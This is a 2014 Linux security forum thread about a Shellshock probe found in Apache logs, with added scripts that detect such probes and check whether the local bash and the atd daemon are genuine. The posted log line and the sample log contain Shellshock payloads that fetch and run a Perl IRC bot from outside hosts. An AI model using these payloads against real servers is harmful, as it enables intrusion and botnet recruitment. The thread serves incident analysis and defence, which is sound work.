Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
09-27-2014, 04:20 PM
#1
LQ Veteran
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Shellshock found in http logs
Found this today in the logs:
Code:
192.227.213.66 - - [27/Sep/2014:10:33:07 -0700] "GET /cgi-bin/hi HTTP/1.0" 404 411 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
I curl'd http://213.5.67.223/jurat and it appears to be an IRC-based "something".
I am not comfortable ignoring this because it shows a 404.
I scanned 46.16.178.158 and I can see Unreal ircd running on several ports including 443 shown in the jurat file.
For now, I simply added those 2 IPs to the firewall.
/tmp is, of course, empty.
Code:
apt-get changelog bash | less
Get:1 Changelog for bash (http://changelogs.ubuntu.com/changelogs/pool/main/b/bash/bash_4.2-2ubuntu2.5/changelog) [108 kB]
bash (4.2-2ubuntu2.5) precise-security; urgency=medium
* SECURITY UPDATE: out-of-bounds memory access
- debian/patches/CVE-2014-718x.diff: guard against overflow and fix
off-by-one in bash/parse.y.
- CVE-2014-7186
- CVE-2014-7187
* SECURITY IMPROVEMENT: use prefixes and suffixes for function exports
- debian/patches/variables-affix.diff: add prefixes and suffixes in
bash/variables.c.
-- Marc Deslauriers <marc.deslauriers@ubuntu.com> Fri, 26 Sep 2014 13:27:53 -0400
bash (4.2-2ubuntu2.3) precise-security; urgency=medium
* SECURITY UPDATE: incomplete fix for CVE-2014-6271
- debian/patches/CVE-2014-7169.diff: fix logic in bash/parse.y.
- CVE-2014-7169
-- Marc Deslauriers <marc.deslauriers@ubuntu.com> Thu, 25 Sep 2014 02:11:10 -0400
bash (4.2-2ubuntu2.2) precise-security; urgency=medium
* SECURITY UPDATE: incorrect function parsing
- debian/patches/CVE-2014-6271.diff: fix function parsing in
bash/builtins/common.h, bash/builtins/evalstring.c, bash/variables.c.
- CVE-2014-6271
-- Marc Deslauriers <marc.deslauriers@ubuntu.com> Mon, 22 Sep 2014 15:31:07 -0400
Advice requested and appreciated.
Thanks.
Last edited by Habitual; 09-27-2014 at 04:24 PM .
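The log line above is the standard Shellshock probe: the User-Agent value starts with `() {`, which a vulnerable bash parses as an exported function definition and then executes whatever follows the closing brace. Apache's mod_cgi exports request headers (User-Agent, Referer and others) as environment variables to the CGI program, so the payload only fires if the requested path maps to a CGI that is bash or spawns bash. A 404 means no such CGI was run for that path, but it says nothing about other CGIs on the host, which is why checking the local bash matters more than the status code. The script below is an added example, not code from the post: it scans a log for probes, extracts the source IPs and second-stage download URLs, and runs the widely published CVE-2014-6271 check against the local bash. The sample log is constructed (its first line mirrors the shape of the one posted above; the other two are invented) and the path under `$TMPDIR` is an assumption.

```shell
#!/bin/sh
# Added example (not from the thread): find Shellshock probes in an access log,
# pull out attacker infrastructure from the payload, and test the local bash.

# Constructed sample log: line 1 mirrors the posted probe (payload in User-Agent),
# line 2 is benign, line 3 carries the payload in the Referer field instead.
SAMPLE_LOG="${TMPDIR:-/tmp}/shellshock_sample.$$"
cat > "$SAMPLE_LOG" <<'EOF'
192.227.213.66 - - [27/Sep/2014:10:33:07 -0700] "GET /cgi-bin/hi HTTP/1.0" 404 411 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
10.0.0.5 - - [27/Sep/2014:10:34:00 -0700] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Sep/2014:10:35:12 -0700] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "() { :; }; /usr/bin/wget http://198.51.100.7/x -O /tmp/x" "-"
EOF

# Lines whose quoted fields carry a bash function definition. mod_cgi exports
# both Referer and User-Agent (HTTP_REFERER / HTTP_USER_AGENT), so either field
# can carry it; the pattern tolerates "() {" with or without inner spaces.
shellshock_lines() {
    grep -E '\(\) *\{' "$1"
}

# Deduplicated source IPs of matching requests: block-list candidates.
shellshock_sources() {
    shellshock_lines "$1" | awk '{ print $1 }' | sort -u
}

# URLs the payload fetches: the second-stage hosts, worth blocking outbound too.
shellshock_payload_urls() {
    shellshock_lines "$1" | grep -oE 'https?://[^ ;"\\]+' | sort -u
}

# The standard CVE-2014-6271 check: an unpatched bash imports the variable as a
# function and runs the trailing "echo vulnerable"; a patched one prints only "test".
bash_cve_2014_6271_status() {
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

echo "Probing sources:"; shellshock_sources "$SAMPLE_LOG"
echo "Payload URLs:";    shellshock_payload_urls "$SAMPLE_LOG"
echo "Local bash: $(bash_cve_2014_6271_status)"
```

Run it against the real log with `shellshock_sources /var/log/apache2/access.log` after sourcing the functions. The changelog quoted above is the reason the check comes back "patched" on an updated Precise box: the `variables-affix` patch makes bash import only variables with its own prefix and suffix, so an arbitrary `() {` value in the environment is no longer parsed as a function at all.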
09-27-2014, 05:39 PM
#2
Member
Registered: Oct 2009
Distribution: Slackware
Posts: 534
Hmm... IRC controlled bot with tcpflooder, udpflooder and spreader and minimal shell control ... I'm not sure if it tries to hide as the atd daemon or uses it to schedule itself for execution (but I can't find where it does this, so my best bet is that it tries to hide as "atd").. I would do a "ps aux | grep atd" and close any atd (if you know it shouldn't run) .. Hmm.. I just realized how rusty my Perl is
09-27-2014, 05:46 PM
#3
Member
Registered: Oct 2009
Distribution: Slackware
Posts: 534
Ok... The bot is very similar to the one described here:
http://handlers.sans.org/jullrich/perlbot.html
It just exploits a different bug and hides itself as a different process..
09-27-2014, 05:51 PM
#4
LQ Veteran
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Original Poster
Thanks Smokey_justme:
Code:
ps aux | grep atd
daemon 814 0.0 0.0 16908 164 ? Ss Sep26 0:00 atd
root 31092 0.0 0.0 8104 928 pts/0 S+ 15:40 0:00 grep --color=auto atd
root@web:~# lsof -p 814
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
atd 814 daemon cwd DIR 202,1 4096 144612 /var/spool/cron/atjobs
atd 814 daemon rtd DIR 202,1 4096 2 /
atd 814 daemon txt REG 202,1 23152 8081 /usr/sbin/atd
atd 814 daemon mem REG 202,1 52120 139250 /lib/x86_64-linux-gnu/libnss_files-2.15.so
atd 814 daemon mem REG 202,1 47680 139448 /lib/x86_64-linux-gnu/libnss_nis-2.15.so
atd 814 daemon mem REG 202,1 97248 145848 /lib/x86_64-linux-gnu/libnsl-2.15.so
atd 814 daemon mem REG 202,1 35680 138615 /lib/x86_64-linux-gnu/libnss_compat-2.15.so
atd 814 daemon mem REG 202,1 14768 145346 /lib/x86_64-linux-gnu/libdl-2.15.so
atd 814 daemon mem REG 202,1 1811128 138163 /lib/x86_64-linux-gnu/libc-2.15.so
atd 814 daemon mem REG 202,1 55744 134835 /lib/x86_64-linux-gnu/libpam.so.0.83.0
atd 814 daemon mem REG 202,1 149280 144960 /lib/x86_64-linux-gnu/ld-2.15.so
atd 814 daemon 0u CHR 1,3 0t0 4763 /dev/null
atd 814 daemon 1u CHR 1,3 0t0 4763 /dev/null
atd 814 daemon 2u CHR 1,3 0t0 4763 /dev/null
atd 814 daemon 3uW REG 0,15 4 7698 /run/atd.pid
Given the low pid, I'd venture a guess that atd is supposed to be running...
No new crons, rkhunter results are as expected.
My concern is that perl processes can fork and hide as discussed here...
Good stuff at http://handlers.sans.org/jullrich/perlbot.html - Thanks.
Pasted at pastebin.com 2 days ago -
http://pastebin.com/gQ3wz2ET
Last edited by Habitual; 09-27-2014 at 06:02 PM .
09-27-2014, 06:01 PM
#5
Member
Registered: Oct 2009
Distribution: Slackware
Posts: 534
Hmm.. Low PIDs are not an indicator of a clean process (well, they are, but PIDs are reusable so I wouldn't risk making a security judgment based on them)...
But it just hit me: the user, since the false "atd" process would be running as the same user as the web server.. So.. yeah.. you don't have to worry about being infected..
It's however pretty scary stuff when we start thinking about how many servers are out there with an unfixed bash... Mrrr.. And I used to think that only Windows machines can be used as bot-farms..
09-27-2014, 06:15 PM
#6
LQ Veteran
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Original Poster
Well, if it was masquerading as atd, wouldn't lsof 'find' whatever processes were running from it as a result?
Assuming lsof hadn't been messed with?
Code:
stat /run/atd.pid
File: `/run/atd.pid'
Size: 4 Blocks: 8 IO Block: 4096 regular file
Device: fh/15d Inode: 7698 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2014-09-26 06:41:01.925729001 -0700
Modify: 2014-09-26 06:41:01.925729001 -0700
Change: 2014-09-26 06:41:01.925729001 -0700
Birth: -
root@web:~# cat /run/atd.pid
814
root@web:~# uptime
16:06:51 up 1 day, 9:26, 1 user, load average: 0.00, 0.06, 0.19
Code:
apt-get changelog lsof | less
Get:1 Changelog for lsof (http://changelogs.ubuntu.com/changelogs/pool/main/l/lsof/lsof_4.81.dfsg.1-1build1/changelog) [10.6 kB]
lsof (4.81.dfsg.1-1build1) lucid; urgency=low
* rebuild rest of main for armel armv7/thumb2 optimization;
UbuntuSpec:mobile-lucid-arm-gcc-v7-thumb2
-- Alexander Sack <asac@ubuntu.com> Sun, 07 Mar 2010 00:56:30 +0100
matches "Modify" in stat output...
Code:
stat -c%y /usr/bin/lsof
2010-03-06 19:33:48.000000000 -0800
Thanks for your time.
09-27-2014, 06:19 PM
#7
Member
Registered: Oct 2009
Distribution: Slackware
Posts: 534
Hmmm... you've gone to great lengths just to prove I'm right about you not being infected? Am I misreading your post or are you misreading mine?
I'm sorry if you're upset about me commenting about you basing a conclusion on the PID... I really am.. I should have just let it be
09-27-2014, 06:21 PM
#8
LQ Veteran
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Original Poster
Quote:
Originally Posted by
Smokey_justme
Hmmm... you've gone to great lengths just to prove I'm right about you not being infected? Am I misreading your post or are you misreading mine?
I'm sorry if you're upset about me commenting about you basing a conclusion on the PID... I really am.. I should have just let it be
I'm just trying to verify that my thought processes and technique on such Important matters is sound.
Last edited by Habitual; 09-27-2014 at 06:23 PM .
09-27-2014, 06:27 PM
#9
Member
Registered: Oct 2009
Distribution: Slackware
Posts: 534
Quote:
Originally Posted by
Habitual
I'm just trying to verify that my thought processes and technique on such Important matters is sound.
Well, it seems to be.. If it looks like a horse and smells like a horse.. It's either the NSA disguised as a zebra or an actual horse...
09-27-2014, 08:10 PM
#10
LQ Veteran
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Original Poster
Well, I'm glad someone else thinks so!
Thanks for all your feedback.
and just in case someone lands here in x years, I ran this also:
Code:
ps -p 814 -o lstart | tail -1 && last reboot | head -1
Fri Sep 26 06:41:01 2014
reboot system boot 3.2.0-69-virtual Fri Sep 26 06:41 - 18:17 (1+11:36)
and that shows me that atd has been running since last system boot.
Last edited by Habitual; 09-27-2014 at 08:18 PM .
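Posts #4, #6 and #10 build up the checks that distinguish a real daemon from a dropped process that merely calls itself "atd": the binary behind the PID (lsof's `txt` line), the PID file pointing at that PID, the user it runs as (a payload dropped through the CGI runs as the web server's user, not `daemon`), and a start time that coincides with boot. The script below is an added example, not code from the thread, that reads the same facts from Linux `/proc` rather than from `ps`/`lsof` output, so it does not depend on those binaries being trustworthy. It assumes Linux (`/proc/PID/exe`, `/proc/PID/status`, `/proc/stat`), and its demo runs against the shell's own PID so that it works anywhere; the `/run/atd.pid`, `/usr/sbin/atd` and uid 1 values in the comments are the ones from the thread, supplied as placeholders for the real call.

```shell
#!/bin/sh
# Added example, not from the thread: "is this atd the real atd" checks read
# from Linux /proc. Demo runs on this shell's own PID; in practice call
#   verify_daemon /run/atd.pid /usr/sbin/atd 1      (uid 1 = daemon on Ubuntu)

# Binary the process is actually executing. A dropped file that was unlinked
# after exec shows as "/path (deleted)"; a perl bot that rewrote $0 to "atd"
# still shows the perl binary here, whatever ps prints in the COMMAND column.
proc_exe() {
    readlink "/proc/$1/exe"
}

# Real uid of the process (second field of the Uid: line in /proc/PID/status).
proc_uid() {
    awk '/^Uid:/ { print $2 }' "/proc/$1/status"
}

# Boot time in epoch seconds, from /proc/stat (what "last reboot" reported above).
boot_epoch() {
    awk '/^btime/ { print $2 }' /proc/stat
}

# Process start time in epoch seconds (what "ps -o lstart" printed above).
# Field 22 of /proc/PID/stat is start time in clock ticks since boot; the comm
# field sits in parentheses and may contain spaces, so fields are counted only
# after the closing ")" (field 22 overall is field 20 of the remainder).
proc_start_epoch() {
    stat_line=$(cat "/proc/$1/stat")
    after_comm=${stat_line##*) }
    ticks=$(echo "$after_comm" | awk '{ print $20 }')
    hz=$(getconf CLK_TCK 2>/dev/null || echo 100)   # assumption: 100 Hz if getconf is missing
    echo $(( $(boot_epoch) + ticks / hz ))
}

# Exit 0 when the process started within "slack" seconds of boot, i.e. was
# started by init at boot rather than by a request hours later.
started_at_boot() {
    slack=${2:-120}
    [ $(( $(proc_start_epoch "$1") - $(boot_epoch) )) -le "$slack" ]
}

# Verify a daemon against its PID file: live PID, expected binary, expected uid,
# binary still present on disk. Prints each failure; returns 0 only if all pass.
verify_daemon() {
    pidfile=$1; expect_exe=$2; expect_uid=$3
    pid=$(cat "$pidfile" 2>/dev/null) || { echo "no pid file"; return 1; }
    [ -d "/proc/$pid" ] || { echo "pid $pid not running"; return 1; }
    exe=$(proc_exe "$pid")
    uid=$(proc_uid "$pid")
    rc=0
    [ "$exe" = "$expect_exe" ] || { echo "exe mismatch: $exe"; rc=1; }
    [ "$uid" = "$expect_uid" ] || { echo "uid mismatch: $uid"; rc=1; }
    case "$exe" in *"(deleted)"*) echo "binary unlinked on disk"; rc=1 ;; esac
    return $rc
}

# Demo on this shell's own PID (constructed PID file under $TMPDIR).
demo_pidfile="${TMPDIR:-/tmp}/verify_demo.$$"
echo $$ > "$demo_pidfile"
verify_daemon "$demo_pidfile" "$(proc_exe $$)" "$(proc_uid $$)" && echo "self-check passed"
if started_at_boot $$; then
    echo "started at boot"
else
    echo "started $(( $(proc_start_epoch $$) - $(boot_epoch) ))s after boot"
fi
rm -f "$demo_pidfile"
```

Two caveats a practitioner would add to the thread's reasoning: `started_at_boot` only tells you a process was launched at boot, so it is the right test for a daemon like atd but would not flag a bot that has persisted through a cron entry or an init script and was itself started at boot; and if the host is genuinely compromised, `/proc` and `readlink` are as subject to tampering as `lsof`, so these checks rule out the simple case (a CGI-dropped perl bot running as the web user) rather than a rootkit.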